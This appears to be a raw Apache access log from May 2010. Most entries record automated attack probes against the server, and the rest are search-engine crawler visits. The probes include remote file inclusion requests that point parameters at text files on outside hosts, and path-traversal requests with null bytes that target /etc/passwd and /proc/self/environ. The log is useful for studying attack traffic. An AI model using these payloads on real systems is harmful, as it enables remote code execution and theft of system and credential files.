188.40.137.140 - - [24/May/2010:01:19:56 -0500] "GET /logs/access_log.1271808000/2%20/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
121.190.102.21 - - [24/May/2010:01:20:02 -0500] "GET /logs/access_log.1273622400%20%20/skin/board/moviefl/download.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.190.102.21 - - [24/May/2010:01:20:02 -0500] "GET /skin/board/moviefl/download.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.190.102.21 - - [24/May/2010:01:20:02 -0500] "GET /logs/skin/board/moviefl/download.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.190.102.21 - - [24/May/2010:01:20:03 -0500] "GET /logs/access_log.1273104000%20%20/skin/board/moviefl/download.php?board_skin_path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.88.4.141 - - [24/May/2010:01:20:21 -0500] "GET /logs//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
121.88.4.141 - - [24/May/2010:01:20:21 -0500] "GET //com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.88.4.141 - - [24/May/2010:01:20:21 -0500] "GET /logs/access_log.1271376000//com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
87.250.255.243 - - [24/May/2010:01:22:22 -0500] "GET /logs/access_log.1205625600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.217.229.185 - - [24/May/2010:01:22:46 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:22:47 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:22:53 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:22:54 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:22:56 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:22:57 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:01 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:02 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:03 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:04 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:04 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:05 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:07 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:08 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:19 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:20 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:21 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:22 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:38 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:39 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:47 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:53 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:55 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:23:56 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:06 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:07 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:07 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:08 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:15 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:16 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
121.88.4.141 - - [24/May/2010:01:24:21 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
121.88.4.141 - - [24/May/2010:01:24:21 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.88.4.141 - - [24/May/2010:01:24:21 -0500] "GET /logs/access_log.1271376000//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.217.229.185 - - [24/May/2010:01:24:36 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:37 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:38 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:38 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:39 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:39 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
121.88.4.141 - - [24/May/2010:01:24:44 -0500] "GET //components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
124.217.229.185 - - [24/May/2010:01:24:44 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:45 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:45 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
121.88.4.141 - - [24/May/2010:01:24:46 -0500] "GET /logs//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
124.217.229.185 - - [24/May/2010:01:24:46 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
121.88.4.141 - - [24/May/2010:01:24:50 -0500] "GET /logs/access_log.1271376000//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.250.255.243 - - [24/May/2010:01:24:50 -0500] "GET /logs/access_log.1237420800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.217.229.185 - - [24/May/2010:01:24:51 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:51 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:52 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:52 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:52 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:53 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:24:57 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:25:00 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:25:01 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:25:06 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
188.40.137.140 - - [24/May/2010:01:25:11 -0500] "GET /logs/access_log.1266537600//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:25:11 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:25:11 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:25:13 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:25:13 -0500] "GET /logs/access_log.1266537600//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:25:13 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:25:13 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:25:13 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:25:13 -0500] "GET /logs/access_log.1266537600//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
124.217.229.185 - - [24/May/2010:01:25:16 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:25:17 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:25:18 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:25:18 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:25:19 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
188.40.137.140 - - [24/May/2010:01:25:20 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:25:20 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:25:20 -0500] "GET /logs/access_log.1271548800//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
124.217.229.185 - - [24/May/2010:01:25:22 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
188.40.137.140 - - [24/May/2010:01:25:23 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:25:23 -0500] "GET /logs/access_log.1271548800//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:25:23 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:25:23 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:25:23 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:25:23 -0500] "GET /logs/access_log.1271548800//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:25:41 -0500] "GET /logs/access_log.1270512000//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
188.40.137.140 - - [24/May/2010:01:25:44 -0500] "GET /logs/access_log.1270512000//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
94.23.20.123 - - [24/May/2010:01:25:45 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.20.123 - - [24/May/2010:01:25:45 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
124.217.229.185 - - [24/May/2010:01:25:46 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
188.40.137.140 - - [24/May/2010:01:25:46 -0500] "GET /logs/access_log.1270512000//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
124.217.229.185 - - [24/May/2010:01:25:47 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:25:47 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:25:48 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
74.55.12.146 - - [24/May/2010:01:26:20 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:26:21 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
121.88.4.141 - - [24/May/2010:01:26:22 -0500] "GET /logs/access_log.1271548800//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
74.55.12.146 - - [24/May/2010:01:26:33 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:26:33 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:26:38 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:26:38 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:26:44 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:26:44 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
121.88.4.141 - - [24/May/2010:01:29:43 -0500] "GET /logs/access_log.1271548800//components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://www.fuerzarh.com/1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
124.217.229.185 - - [24/May/2010:01:30:21 -0500] "GET /logs//_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 325 "-""libwww-perl/5.810"
124.217.229.185 - - [24/May/2010:01:30:22 -0500] "GET //_conf/_php-core/common-tpl-vars.php?conf[lang]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
207.46.204.238 - - [24/May/2010:01:30:32 -0500] "GET /logs/access_log.1189209600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.109.108.186 - - [24/May/2010:01:31:35 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
210.109.108.186 - - [24/May/2010:01:31:35 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
210.109.108.186 - - [24/May/2010:01:31:35 -0500] "GET /logs/access_log.1271548800//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.sharon.or.kr/data/id1.txt???? HTTP/1.1" 404 337 "-""Mozilla/5.0"
87.250.255.243 - - [24/May/2010:01:34:30 -0500] "GET /logs/access_log.1232064000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.30.142.216 - - [24/May/2010:01:35:54 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [24/May/2010:01:35:54 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.143 - - [24/May/2010:01:38:02 -0500] "GET /logs/access_log.1240358400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.12.146 - - [24/May/2010:01:40:04 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:40:05 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:40:05 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:40:05 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:40:08 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:40:08 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:40:12 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.834"
74.55.12.146 - - [24/May/2010:01:40:12 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
91.121.201.191 - - [24/May/2010:01:41:11 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6781 "-""libwww-perl/5.803"
91.121.201.191 - - [24/May/2010:01:41:11 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
87.250.255.243 - - [24/May/2010:01:45:45 -0500] "GET /logs/access_log.1269129600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.23.20.123 - - [24/May/2010:01:49:13 -0500] "GET /logs/access_log.1273363200/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
94.23.20.123 - - [24/May/2010:01:49:13 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
94.23.20.123 - - [24/May/2010:01:49:13 -0500] "GET /logs/index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
